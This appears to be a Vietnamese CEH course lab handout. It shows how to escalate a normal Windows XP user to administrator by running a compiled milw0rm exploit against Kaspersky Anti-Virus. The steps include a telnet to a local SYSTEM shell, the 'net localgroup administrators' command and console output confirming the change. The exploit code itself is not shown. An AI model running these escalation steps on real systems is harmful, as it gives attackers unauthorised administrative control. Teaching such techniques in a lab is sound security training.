Đối với việc nâng quyền trong một hệ thống hacker phải lợi dụng lỗ hổng nào đó, hoặc là từ hệ điều hành, hoặc là từ những phần mềm của hãng thứ 3, trong trường hợp này, chúng ta nâng quyền thông qua phần mềm diệt Virus là Kaspersky Lab. Để chuẩn bị bài lab này, chúng ta lên trang web www.milw0rm.com để tìm thông tin về đoạn mã khai thác này.
Hình ảnh này đã bị thu nhỏ. Nhấp vào hình để xem kính thước thật (556x260). |
Sau đó ta sử dụng đoạn code này biên dịch thày file exe để tấn công vào máy nạn nhân. Để thực hành bài Lab, ta cần phải cài phần mềm Kaspersky vào máy. Sau khi cài xong ta thêm vào máy 1 user bình thường,và tiến hành log on vào user này, Trong bài ta sử dụng user hao và password là hao.
Hình ảnh này đã bị thu nhỏ. Nhấp vào hình để xem kính thước thật (659x409). |
Chạy file exe đã được biên dịch để exploit vào Kaspersky đang chạy dưới quyền admin hệ thống.
Hình ảnh này đã bị thu nhỏ. Nhấp vào hình để xem kính thước thật (657x298). |
Sử dụng lệnh “ telnet 127.0.0.1 8080 “ để truy xuất vào shell có quyền admin hệ thống. Ta tiếp tục sử dụng lệnh “ Net Localgroup administrators hao /add” để add user “ hao” vào nhóm admin, và sử dụng lệnh net user để tái xác nhận
- Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
D:\WINDOWS\system32>
D:\WINDOWS\system32>net Localgroup administrators hao /add
net Localgroup administrators hao /add
The command completed successfully.
D:\WINDOWS\system32>net user hao
net user hao
User name hao
Full Name
Comment
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never
Password last set 8/3/2007 1:47 PM
Password expires 9/15/2007 12:35 PM
Password changeable 8/3/2007 1:47 PM
Password required Yes
Giáo trình bài tập C|EH Tài liệu dành cho học viên
VSIC Education Corporation Trang 25
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 8/3/2007 1:54 PM
Logon hours allowed All
Local Group Memberships *Administrators *Users
Global Group memberships *None
The command completed successfully.
D:\WINDOWS\system32>
Ta thấy user “ hao” bây giờ đã có quyền Admin trong hệ thống, và việc nâng quyền đã thành công. Các bạn có thể test những phần mềm tường tự từ code down từ trang www.milw0rm.com.
Theo VSIC Education Corporation